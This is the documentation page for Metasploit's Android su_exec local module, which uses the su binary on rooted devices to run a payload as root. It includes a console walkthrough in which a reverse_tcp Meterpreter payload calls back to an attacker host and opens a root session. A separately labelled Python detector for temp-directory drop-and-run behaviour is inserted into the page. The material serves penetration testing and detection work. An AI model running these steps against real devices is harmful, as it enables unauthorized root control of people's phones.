
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/android/local/su_exec.md

Vulnerable Application

This module uses the su binary present on rooted devices to run a payload as root.

A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a temporary directory, make it executable, execute it in the background, and finally delete the executable.

On most devices the su binary will pop up a prompt on the device asking the user for permission.

This module will only work on rooted devices. An off-the-shelf Android device is unlikely to be rooted; however, it is possible to root some devices without losing the data. Many devices can be rooted by flashing new firmware, but the existing data will be lost.
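As an added example (not part of the module or its documentation), the following is detection logic for the behaviour the stager described above exhibits: a file written to a temporary directory, made executable, executed, and then removed, with the uid-0 case flagged separately. The audit-line format, the watched directories and the sample events are constructed assumptions; real device telemetry (auditd, an EDR agent) would need its own parser.

```python
import re
from collections import defaultdict

# Constructed watch list and line format: "<epoch> uid=<uid> pid=<pid> <action> <path>"
TMP_DIRS = ("/data/local/tmp/", "/tmp/")
SEQUENCE = ("write", "chmod_exec", "exec", "unlink")
LINE_RE = re.compile(r"^(\d+) uid=(\d+) pid=(\d+) (\w+) (\S+)$")

def parse_event(line):
    """Parse one constructed audit line; None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, uid, pid, action, path = m.groups()
    return {"ts": int(ts), "uid": int(uid), "pid": int(pid), "action": action, "path": path}

def find_drop_and_run(lines, window=60):
    """Alert on each (pid, path) under TMP_DIRS that completes SEQUENCE within
    `window` seconds of the first write; as_root marks the uid-0 case su gives."""
    progress = defaultdict(lambda: (0, 0))  # (pid, path) -> (stage reached, write ts)
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or not ev["path"].startswith(TMP_DIRS):
            continue
        key = (ev["pid"], ev["path"])
        stage, start = progress[key]
        if ev["action"] == SEQUENCE[0]:  # a new write (re)starts the chain
            progress[key] = (1, ev["ts"])
        elif stage and ev["action"] == SEQUENCE[stage] and ev["ts"] - start <= window:
            stage += 1
            if stage == len(SEQUENCE):
                alerts.append({"pid": ev["pid"], "path": ev["path"], "as_root": ev["uid"] == 0})
                del progress[key]
            else:
                progress[key] = (stage, start)
    return alerts

# Constructed sample: one root drop-and-run in the temp dir, one benign temp
# write, and one partial chain outside the watched directories.
SAMPLE_LOG = """\
100 uid=0 pid=4242 write /data/local/tmp/aBcD1
101 uid=0 pid=4242 chmod_exec /data/local/tmp/aBcD1
102 uid=0 pid=4242 exec /data/local/tmp/aBcD1
103 uid=0 pid=4242 unlink /data/local/tmp/aBcD1
200 uid=10080 pid=5151 write /data/local/tmp/cache.bin
201 uid=10080 pid=5151 unlink /data/local/tmp/cache.bin
300 uid=10080 pid=6161 write /data/data/com.example/files/x
301 uid=10080 pid=6161 exec /data/data/com.example/files/x
""".splitlines()
```

Running `find_drop_and_run(SAMPLE_LOG)` returns a single alert for pid 4242 with `as_root` set; the benign write and the chain outside the watched directories produce nothing.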

Scenarios

You'll first need to obtain a session on the target device. To do this, follow the instructions here.

Once the module is loaded, one simply needs to set the SESSION option and configure the handler. An example session follows:

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                        Information         Connection
  --  ----  ----                        -----------         ----------
  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)

msf5 exploit(multi/handler) > use exploit/android/local/su_exec
msf5 exploit(android/local/su_exec) > set SESSION 1
SESSION => 1
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf5 exploit(android/local/su_exec) > set LPORT 4445
LPORT => 4445
msf5 exploit(android/local/su_exec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.176:4445
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (818780 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
```

Please note that in most cases you will have to manually confirm the Superuser prompt on the device itself before the module completes. You can `set WfsDelay 10` to give yourself more time.